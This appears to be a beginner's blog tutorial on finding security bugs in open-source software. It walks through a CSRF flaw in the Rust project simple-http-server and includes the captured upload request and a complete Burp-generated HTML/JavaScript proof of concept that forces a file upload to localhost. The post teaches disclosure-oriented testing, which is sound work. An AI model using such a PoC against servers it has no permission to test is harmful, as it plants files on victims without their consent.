This blog will take you through understanding the practical aspects of open-source security. It’ll also help you to make your first security contribution to an open-source project!

Contents


What is Open Source?

Open source is a term referring to software that are free to use and distribute, the source code is available publicly for anyone to read, contribute to.

Open-source projects can be created by individuals learning to code, small and big organizations, and many other people interested in development and testing. Everyone loves open source because of the spirit and the selfless community. Open-source projects endorse collaborative effort into developing useful software for the world, that too non-commercial most of the times.

Need of Open Source Security

With the increasing use and dependencies over technology, open-source helps people find code for their own usage. The community grows itself with the increasing use of software. Security is a critical component of any software, it helps maintain the integrity and privacy of anyone and any person would always want security in the software they are using.

With our skills, we can contribute to major open source projects for helping people, improving skills, and making the internet safer.

What, How, and Why?

What to hack?

Open-source projects can be of any programming language, technology stack. We have the liberty to choose any project and contribute based on our preferences.

If you know Python, you might be interested in finding vulnerabilities in a project written in the Python programming language.

What to use?

You can use any operating system for testing as long as you’re having the appropriate knowledge and tools available at your disposal.

You might need an IDE or a simple text editor to edit and review code. I use VSCode, Sublime Text for editing code.

Do I need prior experience in hacking?

Having prior experience in bug bounty hunting, penetration testing, code review will help but not necessary at all. Remember, we all start from somewhere and if you’re just starting to learn security by contributing to open source, you didn’t make a wrong decision 😉


Choosing a project

You can choose any open-source project from places like GitHub or GitLab.

You can check out the Trending page for some of the popular repositories and find projects to secure.

trending

Alternatively, in the search bar of GitHub or GitLab, you can search for the type of software you might want to test. Example: Web Server, CMS, To-do lists.

How to Test Functionalities

Once you have selected a project to test, it’s a good idea to install it on your machine. You will usually find installation instructions in the documentation of the project. Instructions vary depending on the project nature and technology stack used for it.

For demonstration, I’m gonna highlight a CSRF vulnerability I found in simple-http-server by TheWaWaR.

Rust - simple-http-server

This web server is written in Rust programming language. You are free to choose literally any piece of software to test!


Demonstrating a CSRF vulnerability

What is CSRF?

CSRF stands for cross-site request forgery. It is a web security vulnerability that allows attackers to make genuine users of an application perform unauthorized actions. It is usually done with an HTML/JS exploit which is unknowingly run by a normal user and actions like changing password, uploading files, changing emails are performed. The attacker can make an exploit script that runs in such a way that user is almost always unaware of the HTTP requests sent in the background that makes the website perform any type of action based on the request received.

The installation instructions of simple-http-server are in README.md file, that’s where you’ll usually find the instructions and other information of any major open-source project.

Installation Instructions

Whichever project you’re choosing, look for the instructions and read them carefully to get an understanding of running it so you can proceed with testing the functionalities of it. Make sure it’s compatible with your machine architecture.


I cloned the repository of simple-http-server and compiled the rust binary. Usage of it is pretty straightforward and the help menu is easy to understand.

First, I checked the help menu to discover the features this open-source web server offered.

Help Menu

By the way, this is a great web server for hosting files locally for testing and sharing files. It has many great features and I noticed a feature of ‘Uploading’. I ran the binary with --upload flag and accessed the server location in my browser.

Web Server - Firefox

We can see that there is an uploading option available which isn’t there if we don’t use --upload flag while running the binary. I quickly uploaded a PNG and a couple of other files and they were all being uploaded to the directory from where the server was started.

I thought this might be vulnerable to cross-site request forgery. Any person could exploit CSRF and make a legit user upload a file without consent as it was a matter of sending just a single HTTP POST request without any security checks such as CSRF token or cookie-based authentication.

I ran Burp Suite to intercept the ‘upload’ POST request and the request is as follows.

POST / HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------49374226323914387693968136327
Content-Length: 295
Origin: http://localhost:8000
Connection: close
Referer: http://localhost:8000/
Upgrade-Insecure-Requests: 1

-----------------------------49374226323914387693968136327
Content-Disposition: form-data; name="files"; filename="testing-csrf.txt"
Content-Type: text/plain

Test File
-----------------------------49374226323914387693968136327--

Burp Suite is a very famous web proxy tool which can be used for intercepting and analyzing live HTTP requests and even modify them based upon our needs. It offers many other utilities inside of it which makes it a great tool for web application hackers. It also has a web vulnerability scanner in-built and Burp Suite is developed by Portswigger. (For more info, visit https://portswigger.net/burp)

Burp Suite has a great feature to generate a CSRF proof of concept that can be used to demonstrate the exploitation.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/localhost:8000\/", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------49374226323914387693968136327");
        xhr.withCredentials = true;
        var body = "-----------------------------49374226323914387693968136327\r\n" + 
          "Content-Disposition: form-data; name=\"files\"; filename=\"testing-csrf.txt\"\r\n" + 
          "Content-Type: text/plain\r\n" + 
          "\r\n" + 
          "Test File\r\n" + 
          "-----------------------------49374226323914387693968136327--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

This is an HTML file and upon accessing it inside our browser application, we get a “Submit” button, and as soon as I clicked it, a POST request was sent to upload the file to the directory from where simple-http-server started.

The JavaScript code inside <script> tag sends a multipart form data to the address “http://localhost:8000” (the address of the web-server)

Multipart/form-data is a content type used to upload blocks of data separated by boundary strings (“49374226323914387693968136327” in this case).

I saved the PoC HTML file and accessed it through a different port, a different server and clicked on “Submit Request”.

The target application “simple-http-server” got the POST request and logged it in the terminal as soon as I clicked Submit button in the CSRF PoC.

CSRF exploitation log

We can see a request with the status code “302 Found” and a log that says >> File Saved: testing-csrf.txt. This proves the successful exploitation of Cross-Site Request Forgery in simple-http-server


Summary Of The Finding

  • Found a project on GitHub by searching for “Web Server”.
  • Cloned the repository and compiled the source code to use the software.
  • Checked for the features the software offers.
  • Used a feature “upload” like a normal user to test if it works and how.
  • HACKER THOUGHTS… (Thinking of potential attack cases and scenarios just by looking the HTTP requests)
  • Decided to test for CSRF as there wasn’t any protection against it.
  • Thought of an exploitation scenario and made a proof of concept to exploit the security vulnerability.
  • Reported the security issue.

Understanding this summary is important because this workflow can be used to test the majority of the open-source applications out there.

Approach to Hunt

I hope you understood the summary of the CSRF finding, I will now explain the approach I took to do it in a more general way, you can use this methodology to hack stuff yourself.

Common approach to search for vulnerabilities

  • We start looking through the documentation, help menu to discover features that can be abused by an attacker.
  • We enumerate those specific features and functionalities further to take a look at how they work.
  • Looking for spots where vulnerabilities could exist.
  • Trying out potential vulnerabilities in those spots.
  • If it works, we exploit and validate the finding.

Such an approach can help you find vulnerabilities but sometimes the process can become more complicated as it’s dependant upon the nature of the application you’re testing. In such cases, you might need to adapt to different methodologies. Always embrace the challenges as they help you grow!


What are the things to look for?

There are many bug classes to be aware of if you’re into security. Resources are freely available on the internet to help you learn different bug classes, the logic behind them, and ways to hunt.

In the end, once you learn about some bug classes and scenarios, you will need to use your creativity to understand an application and test accordingly.


Resources

There are plenty of resources available on the internet from where you can learn about specific bug classes and scenarios. Here are some resources for the most common bugs and vulnerabilities:

Cross-site scripting

  1. https://github.com/s0md3v/AwesomeXSS - Repository by s0md3v with collection of XSS resources.
  2. https://portswigger.net/web-security/cross-site-scripting - Free XSS labs by Portswigger.
  3. https://brutelogic.com.br/blog/ - Brutelogic’s blog page with many XSS related material.
  4. https://www.youtube.com/watch?v=gVrdE6g_fa8&feature=youtu.be - LiveOverflow’s video on XSS.

Server-side Request Forgery

  1. https://cobalt.io/blog/a-pentesters-guide-to-server-side-request-forgery-ssrf - Blog by Cobalt’s Busra Demir on SSRF vulnerabilities.
  2. https://portswigger.net/web-security/ssrf - Free SSRF labs by Portswigger.
  3. https://github.com/jdonsec/AllThingsSSRF - A great collection of SSRF resources.

Local File Inclusion

  1. https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601 - Medium article by Aptive on LFI vulnerabilities.

Prototype pollution

  1. https://www.youtube.com/watch?v=J3MIOIqvV8w - Great video by HTTPVoid for an in-depth explanation of prototype pollution vulnerability.
  2. https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2 - Very detailed blog by Nikita Stupin about Prototype Pollution.

You can read checklists, cheatsheets to get familiar with more vulnerability types and find resources online. Pro Tip: Read disclosed vulnerability reports to get to know more about the practical stuff.

For information on “How to report bugs in open-source?”, you can read my previous blog - https://ritiksahni.me/open-source-bug-bounty


I hope you enjoyed this blog and are excited to contribute to the security of open-source software! Feel free to message me on my socials for feedback/suggestions. Contact Me

Thank you for reading!

Back to Top